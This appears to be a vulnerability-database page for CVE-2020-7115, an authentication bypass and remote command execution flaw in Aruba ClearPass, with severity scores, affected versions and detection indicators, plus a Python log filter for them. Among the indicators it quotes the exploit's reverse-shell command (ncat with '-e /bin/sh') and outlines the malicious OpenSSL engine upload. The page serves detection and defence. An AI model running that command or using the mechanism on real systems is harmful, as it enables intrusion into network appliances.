cbcvebase.
CVE-2020-7115
published 2020-06-03

Priority: P1 · 85 · critical
CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS: 64.60% (99.1th percentile)

The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass, an attacker could then execute an exploit that would allow remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and higher.

Affected

4 ranges

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arubanetworks | clearpass_policy_manager | | |
| arubanetworks | clearpass_policy_manager | 6.7.0 – 6.7.13 | |
| arubanetworks | clearpass_policy_manager | >= 6.8.0 < 6.8.6 | 6.8.6 |
| arubanetworks | clearpass_policy_manager | >= 6.9.0 < 6.9.1 | 6.9.1 |

Detection & IOCs (extracted from sources)

url: https://<host>:<port>/tips/tipsSimulationUpload.action
path: /tmp/clientCertFile*.txt
filename: payload.so
command: rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh
  • Monitor for HTTP POST requests to the endpoint /tips/tipsSimulationUpload.action, especially those containing a 'clientPassphrase' field with the value 'req -engine' followed by a path — this is the authentication bypass + engine injection trigger.
  • Alert on file uploads of .so (shared object) files to the ClearPass web interface, particularly to the tipsSimulationUpload.action endpoint, as the exploit delivers a malicious OpenSSL engine as a .so file.
  • Detect creation or presence of files matching the pattern /tmp/clientCertFile*.txt on ClearPass hosts, as the exploit drops the malicious engine payload to this path.
  • Detect outbound ncat/netcat connections spawned from the ClearPass process with the '-e /bin/sh' flag, indicating a reverse shell established post-exploitation.
  • The exploit targets unauthenticated access to the ClearPass web interface — alert on any unauthenticated POST to /tips/tipsSimulationUpload.action as this endpoint should require authentication.
  • The exploit specifically requires the malicious OpenSSL engine (.so) to be compiled on RHEL/CentOS 7.x for compatibility with the target ClearPass environment; detections for the .so upload may need to account for this platform-specific artifact.
  • Affected versions span multiple branches: ClearPass 6.7.x prior to 6.7.13-HF, 6.8.x prior to 6.8.5-HF, and 6.9.x prior to 6.9.1. Detection rules should not be scoped to only 6.7.0.
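
The HTTP-level checks in the list above can be combined into one log filter. The following is an added example, not part of the original page or of any vendor tooling; the JSON log format, its field names (`src`, `session`, `fields`, `uploads`) and the sample records are constructed assumptions standing in for a reverse proxy or WAF that logs request bodies in front of ClearPass.

```python
import json
import re

ENDPOINT = "/tips/tipsSimulationUpload.action"
ENGINE_RE = re.compile(r"\breq\s+-engine\b")

# Constructed sample records, one JSON object per line. The field names are
# assumptions: "session" is true when the proxy saw a valid authenticated session.
SAMPLE_LOG = """\
{"src":"192.0.2.10","method":"GET","path":"/","session":false,"fields":{},"uploads":[]}
{"src":"192.0.2.11","method":"POST","path":"/tips/tipsSimulationUpload.action","session":true,"fields":{"clientPassphrase":"example"},"uploads":["client.pem"]}
{"src":"198.51.100.7","method":"POST","path":"/tips/tipsSimulationUpload.action","session":false,"fields":{"clientPassphrase":"req -engine <path>"},"uploads":["payload.so"]}
{"src":"203.0.113.5","method":"POST","path":"/tips/tipsSimulationUpload.action?x=1","session":false,"fields":{},"uploads":[]}
"""

def classify(record):
    """Return the CVE-2020-7115 indicators matched by one request record."""
    path = record.get("path", "").split("?", 1)[0]  # ignore any query string
    if record.get("method", "").upper() != "POST" or path != ENDPOINT:
        return []
    reasons = []
    if not record.get("session"):
        reasons.append("unauthenticated-post")
    passphrase = record.get("fields", {}).get("clientPassphrase", "")
    if ENGINE_RE.search(passphrase):
        reasons.append("engine-in-clientPassphrase")
    if any(name.lower().endswith(".so") for name in record.get("uploads", [])):
        reasons.append("shared-object-upload")
    return reasons

def scan(log_text):
    """Return (source address, reasons) for every record with at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        try:
            record = json.loads(line)
        except ValueError:
            continue  # skip blank or malformed lines
        if not isinstance(record, dict):
            continue
        reasons = classify(record)
        if reasons:
            findings.append((record.get("src"), reasons))
    return findings

if __name__ == "__main__":
    for src, reasons in scan(SAMPLE_LOG):
        print(src, ",".join(reasons))
```

The host-side indicators (files matching /tmp/clientCertFile*.txt and ncat spawned with `-e /bin/sh`) are not visible in HTTP logs and need file and process telemetry from the appliance.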

CVSS provenance

nvd · v3.1 · 9.8 · CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 10.0 · CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C